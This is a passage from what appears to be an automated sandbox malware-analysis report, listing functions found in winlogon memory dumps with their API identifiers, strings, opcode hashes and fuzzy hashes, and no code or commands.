                                                                  • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction ID: 01ae105a6c3837a234ab14f732a3daf1352ec0095d2bc56e3ded02a5a07e3e39
                                                                  • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction Fuzzy Hash: 9161CE7B60CF94AAEB60CFA9D04439D77A1F348B89F148255EF5A13B99DB38C485C700
                                                                  Function 00000225DC67B1A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 1192e165236138bb11f34f6d3f9c5d4677eb9750fe728f24835b1bdbfb99651f
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: C551D63A104BA0E6EB748F99D44836D77A0F395B96F14DA15DB5987FD5CB38C890C700
                                                                  Function 00000225DC61A5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 483296107c23689895028ca8bef6d8b28cf40f2ec694d9ee99b3c2fae934abae
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: 0951D13E101BA0E6EF748FAAD44835877A0F354B97F24C216EA9987BD6CB38D551CB00
                                                                  Function 00000225DC64B1A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 3f41ab7ce8519959cbad1de455fb2c3e84bf3999aa78db3a38c3eb7572837df2
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: AD51933A10CF60E6EB648FAAD44836D7791F395B8AF14C255DB4A87BD6CB38C451C700
                                                                  Function 00000225DC673554 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID: pid_
                                                                  • API String ID: 517849248-4147670505
                                                                  • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction ID: 4056b5c2b8063a5704fc5948a2cc825df2d40e837e061ba2018861c5dd828e58
                                                                  • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction Fuzzy Hash: 4F115429314F62B2FB50DBADE81979952A4FB44B92FA085319E4993FD4EF38C905C740
                                                                  Function 00000225DC643554 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID: pid_
                                                                  • API String ID: 517849248-4147670505
                                                                  • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction ID: 07f90da04163dc3b659dd41bba0112b6b973e66babdd7fa66952a63cce6603ae
                                                                  • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction Fuzzy Hash: 1211842931CF66B1FB50D7ADE80939972A0F744B92F9081719E4A93B94EF38C945C740
                                                                  Function 00000225DC682488 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                  • String ID:
                                                                  • API String ID: 2718003287-0
                                                                  • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction ID: aa7b0206ff3034d73e68d8f770ffb95cbc7ed05fd63c629f7674de48f24b2dcd
                                                                  • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction Fuzzy Hash: 97D12176B04E90AAEB12CFF9D44839C37B1FB54B99F408216CE5997BD9CA34C44AC741
                                                                  Function 00000225DC652488 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                  • String ID:
                                                                  • API String ID: 2718003287-0
                                                                  • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction ID: 57ee99270b9c1eaf48f50f5fff10c1dcedfced4da08985b2ef85061a5fb2925f
                                                                  • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction Fuzzy Hash: B8D1F136B24E90A9E712CFFDD44839C37B1F354B99F248216CE5A97B99DA34C44AC740
                                                                  Function 00000225DC6714A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction ID: d198d0402c3cd64bf19a3c42572fc19e99f05a35975699a57ecc9879073096a2
                                                                  • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction Fuzzy Hash: 30011E3A610EA0D6D744DFEAE80C25AB7A1FB88F82F448425EB8A5775ADE38C455C740
                                                                  Function 00000225DC6414A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction ID: ae5a94581dd254dcea49812c76861850ded1eacc24209e508c0d2b977c515518
                                                                  • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction Fuzzy Hash: AD01213A614EA0D6D754DFEEE80815AB7A1F788F82F148425EF4A53B19DF38C455C740
                                                                  Function 00000225DC682DB0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC682D9B), ref: 00000225DC682ECC
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC682D9B), ref: 00000225DC682F57
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastMode
                                                                  • String ID:
                                                                  • API String ID: 953036326-0
                                                                  • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction ID: 3c1f05aba021795ff7175e063720aa5e6c5463a2587f973e92fd774eacd69bd0
                                                                  • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction Fuzzy Hash: C191E77A710E70A5F762DFAD94883AD2BA0FB44B8AF54C119DE0A67BC5DB34C446C702
                                                                  Function 00000225DC652DB0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC652D9B), ref: 00000225DC652ECC
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC652D9B), ref: 00000225DC652F57
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastMode
                                                                  • String ID:
                                                                  • API String ID: 953036326-0
                                                                  • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction ID: 6abb4479ed5ce15c474aeea384350e77a5f7a21677473c94f47e63f0f9e8d521
                                                                  • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction Fuzzy Hash: 5891C57A720E70A5F7629FED94883AD3BA0F744F8AF248119DE0A57B95DB35C486C700
                                                                  Function 00000225DC677D90 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction ID: e5c13c2da8d7d5dbcbc508a7cc06e0c60fad03daceb6359ca316b1c5a3530366
                                                                  • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction Fuzzy Hash: 21115E2A714F109AEF00CFA4E8593A833A4F719759F440E21DB6D4A7A4DF78C1A8C381
                                                                  Function 00000225DC647D90 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction ID: 15406291821e2fe318be73519a99bbba27e0b2cf66864646268de93d0c853935
                                                                  • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction Fuzzy Hash: 4D115E2A754F109AEF00CFE4E8593A933A4F719769F440E21DB6D867A4DF78C1A8C380
                                                                  Function 00000225DC672604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: a85847b67241baf17023e07e2423d193898fd8a9f6832c40be14186a221c179b
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: 1D71F63A200FA1A2E736DFBE994C3AA67A4F784B86F548426DE4947FD8DE35C505C700
                                                                  Function 00000225DC642604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: 0b476176dd215437889dc5df2a4e6f11728681cd4880218d94dbd171e8afe587
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: 5071E83A20CFA1A6E766DFEE98483AE7795F385B86F648056DE0B43799DE34C504C700
                                                                  Function 00000225DC61A24C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CallTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3163161869-2084237596
                                                                  • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction ID: 066c3195d6b19765af3cd44653234e3342ca3be28e8e599a30405b6f21608ec7
                                                                  • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction Fuzzy Hash: 57619C3B605F94DAEB20CFA9D48439D77A0F748B8AF148215EF4957B99DB38C485C700
                                                                  Function 00000225DC6723F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction ID: bdc2000d3f24de824ac2d4aad0dd8e4e216f71541df1a140ad56c1d4500cd6f8
                                                                  • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction Fuzzy Hash: 6751276A204FA1E2F636DFADA46C3AA67A1F384782F548825DE4903FD9DE39C445C740
                                                                  Function 00000225DC6423F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction ID: eeae6fd4fd106a8d8e2af77007ce35b523d6da56c77ba8b82f46824129fdf85d
                                                                  • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction Fuzzy Hash: 88514C2A20CFA1A1E62ADFEDA46C3AA7791F385782F64C065CE4B43B89DE35C444C740
                                                                  Function 00000225DC622DDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
